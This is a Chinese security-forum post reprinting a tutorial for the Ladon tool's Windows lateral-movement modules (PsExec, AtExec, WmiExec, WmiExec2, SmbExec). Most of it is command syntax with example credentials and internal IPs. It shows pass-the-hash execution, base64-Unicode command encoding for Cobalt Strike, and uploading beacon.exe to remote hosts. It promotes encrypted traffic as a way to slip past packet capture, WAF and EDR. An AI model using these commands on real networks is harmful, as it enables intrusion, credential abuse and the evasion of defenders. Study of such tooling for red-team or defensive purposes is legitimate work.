设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 Ladon横向移动(加密通讯)、Hash传递教程
返回列表 发新帖
查看: 960|回复: 0

Ladon横向移动(加密通讯)、Hash传递教程

[复制链接]
adopi

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-9-25 00:27:05 | 显示全部楼层 |阅读模式
Ladon横向移动(加密通讯)、Hash传递教程
内网横向移动工具非常多,有各种语言实现的wmi、smb、psexec等,其中最常用的当属微软的psexec和impacket工具包,现在psexec早已被很多杀软针对,基本上已经很少使用。那么多工具,为什么Ladon还要重复造轮子,添加这些横向移动模块功能? 只是单纯体积小?功能集成在一个工具?当然不只是以上原因,另一个是,发现网上各类横向移动工具,通信上几乎都不加密,传输全是明文,执行的命令或命令结果,从流量上就可轻易发现攻击者,WAF也可以轻易拦截数据包,非加密通讯的工具能在目标里使用,没有被发现,只能是两个原因,一是WAF或所谓EDR、XDR、MDR等各种牛逼名职的防护软件垃圾,二管理员垃圾。不然这几个非常火的工具在被使用将近20年的情况下,绝对会被防护软件拦截,如果管理员稍微有点水平,抓个包,也能轻易发现攻击者。

加密通讯

先来看下impacket工具包,通讯并没有加密,可看到执行的命令和结果

psexec k8gege/null:K8gege520?@192.168.50.139



psexec k8gege/null:K8gege520?@192.168.50.139



0x001 Ladon PSexec 交互式回显

通讯加密,抓包可看到执行命令、命令结果都是加密的

net use \\192.18.50.235 K8gege520? /user:null
Ladon psexec 192.168.50.235



0x002 Ladon AtExec 非交互式回显

Ladon AtExec host user pass cmdline
Ladon AtExec host user pass cmdline user
Ladon AtExec  host user pass b64cmd cmdline
Ladon AtExec  host user pass b64cmd cmdline user

域用户 明文密码 执行whoami命令



cmd经过Ladon GUI的Base64_Unicode编码,防止CS解析双引号问题



    Ladon的各类横向移动模块或者提权模块如bypassUAC等cmd,均使用base64 Unicode编码,网上工具大部份都是默认base64编码,加密后可能无法执行命令。有些人可能会说为什么非要用unicode,有没一种可能万一你要执行的命令包含非英文字符,普通编码是不是会乱码?到时你又会说,加密后乱码问题,所以之前有些模块没有使用unicode的,下一版本更新,也都统一为Base64 Unicode编码。如calc加密,默认编码结果为Y2FsYw==,使用unicode编码结果为YwBhAGwAYwA=,都是英文字符串,但结果是完全不一样的,所以使用默认base64加密执行不了命令。



0x003 Ladon Wmiexec 非交互式回显

Ladon WmiExec host user pass cmd cmdline
Ladon WmiExec host user pass b64cmd cmdline

base64 cmd执行



域用户执行命令,当然也支持b64cmd,大家要举一反三



0x004 Ladon Wmiexec2 非交互式回显 支持Hash传递、文件上传

通过minikatz或其它工具注入hash获取的shell后,在shell上使用pth参数,即可通过hash传递执行命令。

Usage:
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd whoami
Ladon WmiExec2 host user pass b64cmd whoami
Upload:
Ladon WmiExec2 host user pass upload beacon.exe beacon.exe
Ladon WmiExec2 pth host upload beacon.exe beacon.exe

base64 cmd执行



wmiexec2 域用户执行命令



0x005 Ladon  SmbExec 无回显、Hash传递

    支持明文密码、ntlm Hash传递执行命令,此模块无回显

    支持b64cmd,使用base64加密cmd,防止CS下双引号等报错

Ladon SmbExec host user pass cmd cmdline
Ladon SmbExec host user pass b64cmd cmdline
Ladon SmbExec host user Hash cmd cmdline
Ladon SmbExec host user Hash b64cmd cmdline



Hash传递执行命令



PS: 在Cobalt Strike插件、LadonShell、PowerShell或其它远控Shell上用法一致,本文就不一一截图演示了。

简明教程252例: https://github.com/k8gege/Ladon


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 23:33 , Processed in 0.024275 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表